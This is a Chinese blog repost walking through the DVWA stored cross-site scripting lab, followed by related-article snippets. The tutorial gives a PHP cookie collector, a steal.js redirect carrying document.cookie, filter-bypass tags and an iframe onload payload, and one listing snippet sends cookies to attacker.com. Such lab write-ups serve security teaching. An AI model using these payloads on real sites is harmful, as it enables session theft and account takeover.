【DVWA(五)】XXS存储型跨站攻击

最新推荐文章于 2024-12-18 09:53:02 发布
最新推荐文章于 2024-12-18 09:53:02 发布
阅读量255 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php 数据库
原文链接:http://www.cnblogs.com/wayne-tao/p/11079859.html
本文主要介绍XSS存储型跨站攻击,相较于反射型危害更严重。通过low、medium、high、impossible四个难度级别进行测试,展示了不同难度下的攻击方法,如构造JS代码、利用标签绕过处理等,还探讨了反射型与存储型的区别及结合CSRF漏洞攻击的思考。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS存储型跨站攻击(Stored Cross Site Scripting)

前言:

相较于XSS反射型跨站攻击,存储型具有更严重的危害,如果在窃取信息的同时对网页没有任何变化,那受害者将很难发现。

如果我有写的不太明白的地方,可以先看看之前XSS反射型跨站攻击的随笔

low:

1.观察:

测试输入模式,有两个输入框,经测试,都有输入限制,这个限制用网页查看器很容易解决,我给改成了1000,其实不改也可以,就是在message里输入payload也可以的;

2.输入:

alert测试

<script>alert("test")</script>

3.刷新:

此时已经将有攻击的脚本数据传到数据库了,刷新之后就会弹出alert,触发xss!
这就是存储型XSS攻击的厉害之处了,只要任何人访问此网址,都会触发,因此比反射型更加严重!
现在clear掉数据库信息,开始正式进行攻击。

4.php代码:

在www里新建php文件,用于偷取cookie:

<?php

$cookie=$_GET['cookie'];
file_put_contents('get_low_dvwa_cookie.txt',$cookie);

?>

5.构造JS代码:

这次采取与反射型不同的方式,不在输入框里直接输入js代码段,而是在www下写脚本文件,然后利用标签加载网址对应的js代码
新建JS文件steal.js:

document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie

6.XSS攻击加载JS代码:

构造payload:

name:<script src="http://127.0.0.1/steal.js"></script>

message:steal

提交之后可以看见,界面跳转了,说明攻击成功

7.隐蔽:

现在攻击成功,但是跳转界面容易让用户怀疑,所以进一步调整,尽量隐蔽,能够不引起直观变化的情况下进行攻击获取cookie。
利用ajax,在不刷新的情况下偷取cookie!挖坑XD

medium:

用大小写组合,绕过对于<script>的处理:

<SCRIPT>
<scr<script>ipt>

接下来和low一样了。其实这里跟反射型的XSS大同小异。

high:

1.用alert尝试

不行

2.用大小写组合尝试

不行

3.换标签

用 <iframe onload=alert("test")> 测试,可行!

4.构造payload:

name:<iframe onload=document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie>

message:steal

成功!

impossible:

暂时依旧无解

后记

因为是存储型,所以测试的时候会出现,一直跳转的情况,所以在后台把记录删掉就好了。

然后是合天网安相关部分的两个思考:

1)反射型跨站和存储型跨站的区别和利用方法的不同?

反射型是偏向实时的,点对点的最有效,把链接发送给某个人,这样最好了;然后存储型是大范围撒网,一旦形成了攻击,存进了数据库,就有大把的数据了!

2)如何结合CSRF漏洞攻击?

暂时还没搞这部分,留坑

转载于:https://www.cnblogs.com/wayne-tao/p/11079859.html

Kali渗透测试之DVWA系列5——存储XSS(跨站脚本攻击)
浅浅的博客
05-11 3022
目录 一、原理示意图 二、实验环境 三、实验步骤 安全级别:LOW 重定向 获取cookie 安全级别:Medium 安全级别:High 安全级别:Impossible 存储XSS 长期存储于服务器端 每次用户访问都会被执行javascript脚本 了解XSS简...
安全测试--存储跨站实验
Qton_优快云的博客
02-27 254
步骤4-1:提交框中输入&lt;script&gt;alert(“hello qton”)&lt;/script&gt;     介绍:http://blog.youkuaiyun.com/cjf_iceking/article/details/52176029 跨站脚本攻击(Cross Site Script, XSS),通常来说就是在网页中嵌入恶意代码, 通常来说是Javascri...
存储跨站脚本攻击
热门推荐
一个程序员的修炼之路
08-10 1万+
XSS跨站脚本攻击(Cross Site Script, XSS),是最常见的Web应用应用程序安全漏洞之一,也是OWASP 2013 Top 10之一。 XSS通常来说就是在网页中嵌入恶意代码, 通常来说是Javascript,当用户访问网页的时候,恶意脚本在浏览器上执行。存储XSSXSS主要分为三种类: 反射XSS,存储XSS和DOMXSS。本文主要阐述的是存储XSS,简单来说明一下
存储xss_存储跨站脚本攻击(XSS)
weixin_39912580的博客
12-12 1032
存储的XSS和反射的XSS最大的区别就是在于存储是永久性的,这段恶意信息会被写入到数据库中,每次打开被注入恶意代码的页面均会被攻击这种方式通常是发生在论坛,评论,留言等地方,这些能够存储相关信息也能显示出来的地方,所以危害最大而其他两种方式则通常是通过链接的方式进入,只要对不明站点提高警惕则不会被攻击,而存储通常是在用户信任的网页中防护等级:低首先添...
存储跨站脚本漏洞解决
qq_39869537的博客
05-21 3374
问题:访问“信息采集列表”模块,填写在“客户名称”处填写<script>alert(1111111)</script>,再次查询时候页面弹框,将脚本存入了数据库 解决:需要对特殊字符进行过滤 var pattern=/[`~!@#$^&*()|{}':;',\\\[\]\.<>\/?~!@#¥……&*()——|{}【】';:""'。,、?]/...
DVWA系列(四)——使用Burpsuite进行存储XSS(存储跨站脚本攻击
橘子女侠
05-05 2770
存储XSS 长期存储于服务器端; 每次用户访问都会执行脚本代码; 1. 存储XSS攻击图示 (1)获取被攻击者的cookie; 黑客首先向服务器发送js脚本; 服务器返回含有js脚本的页面;并将该页面存储在服务器上; 当被攻击方访问服务器时,服务器返回存储的js页面; 黑客接收到被攻击方的cookie; (2) 重定向到第三方网站; 黑客首先...
Kali渗透测试之DVWA系列4——反射XSS(跨站脚本攻击)
浅浅的博客
05-11 4528
目录 一、XSS 1、XSS简介 2、XSS类 3、漏洞形成的根源 二、反射XSS 1、原理示意图​ 2、实验环境 3、实验步骤 安全级别:LOW 重定向 获取cookie 安全级...
XSS漏洞(跨站脚本攻击
2301_76622364的博客
12-18 1256
XSS类存储反射DOM触发过程构造xss脚本后正常用户访问携带xss脚本页面正常用户访问携带xss脚本的URL正常用户访问携带xss脚本的url数据存储数据库URLURL谁来输出后端web应用程序后端web应用程序前端Javascript输出位置http响应中http响应中动态构造的DOM节点是否持久是否否。
XSS跨站脚本攻击漏洞之2DVWA中的利用和绕过
ISNS的博客
03-07 960
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ DVWA是一款非常好的web漏洞练习平台,也是一款非常好的学习php代码审计的一个平台。我们可以利用它来学习XSS漏洞。 安装环境 平台搭建好以后,登录账号:admin,密码:password。 设置安全级别 一共有四个级别:Low、Medium、High、impossible。 我们依次测试每个...
DVWA——XSS注入复现
qq_62056583的博客
07-13 2077
在对DVWA靶场漏洞复现前,先了解一下XSS漏洞的相关知识攻击者利用它向网页中注入恶意的客户端脚本,使得用户在访问页面时执行这些恶意脚本,从而达到攻击的目的。这种攻击通常利用了网站未对用户输入进行充分过滤或转义的情况。XSS的攻击方式分为三种,分别是:分别为反射(Reflected)存储(Stored)和DOM。:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库):将用户输入的数据存储在服务器端。
存储Xss成因及挖掘方法
02-21
存储Xss成因及挖掘方法
存储Xss跨站式脚本攻击解决方案
weixin_44442403的博客
10-15 1722
一 新建一个XssFilter类 package com.walk.common.xssnew; import java.io.IOException; import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.servlet.FilterConfig; import javax.servl...
存储XSS(全局) 跨站类漏洞
修身、齐家、治国、平天下!
02-09 829
漏洞描述:攻击者可在漏洞处输入恶意代码保存到数据库,当展示到列表时,返回信息被浏览器当作html解析的情况下,XSS被触发。可造成Cookie泄露等问题。 例如在界面文本域输入<h2>12345</h2>、<script>alter(12345)</script>这样的值,如果程序未进行处理,会存储数据库。下次回显会出现异常界面或弹出异常框,如果进行恶意攻击,可能后果不堪设想。 解决方案: 1、从客户端获取到的参数必须进行安全校验,过滤觉攻击字符。
php 存储跨站,WordPress 3.3.2存储跨站漏洞
weixin_42360972的博客
03-26 152
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。感谢minminmsn投稿,WordPress最新版本3.3.2存在一个双字节编码的存储跨站漏洞,可以bypass内置的filter机制,但是利用起来有点鸡肋,细节如下:1:登录管理账户2:单击分类3:填写跨站参数,并用burp suite拦截请求4:输入%253cscript%2...
存储xss调研
weixin_33716154的博客
06-28 204
存储xss调研 概念 存储XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。 常见的xss攻击方法   1.绕过XSS-Filter,利用<>标签注入Html/JavaScript代码;...
Hetian lab Day 9 DVWA存储跨站
喵喵喵
08-07 429
文章目录预备知识实验目的实验环境实验步骤lowmedium分析与思考 预备知识 XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网站,携带木马等。 XSS之所以会发生, ...
19.存储XSS入门 [什么都没过滤的情况]
→_→
05-23 452
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net ------------------------------------------------------------------------------------------------------------------------------- 简要描述: 存储和反射相比,只是多了输入存储、输出取出的过程。简单点说: 反射是:输入--输出; 存储是:输入--进入数据库*--取出数据库--输出
浅谈“XSS跨站脚本攻击漏洞”
→_→
05-20 1404
漏洞名称: 存储XSS跨站脚本,反射XSS跨站脚本, 描述: 跨站脚本攻击的英文全称是Cross Site Script,为了和样式表区分,缩写为XSS。发生的原因是网站将用户输入的内容输出到页面上,在这个过程中可能有恶意代码被浏览器执行。跨站脚本攻击,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用X
dvwa存储XSS钓鱼攻击模拟 .
最新发布
02-08
### DVWA 存储 XSS 钓鱼攻击模拟实验教程 #### 实验环境准备 为了进行存储XSS钓鱼攻击的模拟实验,需先设置好DVWA(Damn Vulnerable Web Application)平台。确保已安装并配置完毕该应用,并调整安全性等级至`LOW`以便于测试。 #### 攻击原理说明 存储XSS是指攻击者提交含有恶意脚本的数据给Web应用程序,这些数据被保存在目标系统的数据库或其他持久化存储介质内[^1]。每当有新访客加载包含此有害内容的页面时,浏览器便会自动执行嵌入式的JavaScript代码,无需任何额外交互动作即可实施攻击行为。 #### 构造Payload 针对此次实验目的——实现钓鱼功能,则可以创建一个看似合法却暗藏玄机的消息表单或链接作为payload。例如: ```html <a href="javascript:void(0)" onclick="window.location='http://attacker.com/stole?cookie='+document.cookie">点击领取奖品</a> ``` 这段HTML代码会在用户点击“点击领取奖品”的时候重定向到攻击者的站点并将当前用户的Cookie信息附加为查询参数传递过去[^3]。 #### 发布Payload 登录进入DVWA界面后找到能够发布留言的地方(比如Guestbook),将上述构造好的payload粘贴进去并提交。此时,这条消息已经被服务器接收并存入数据库等待其他用户触发。 #### 结果观察 一旦另一位受害者访问了带有未过滤输入项的页面,其浏览器将会解析并运行之前留下的恶意脚本,从而导致个人信息泄露等问题的发生。值得注意的是,在实际环境中应当严格遵循法律规范开展此类研究活动,严禁非法操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值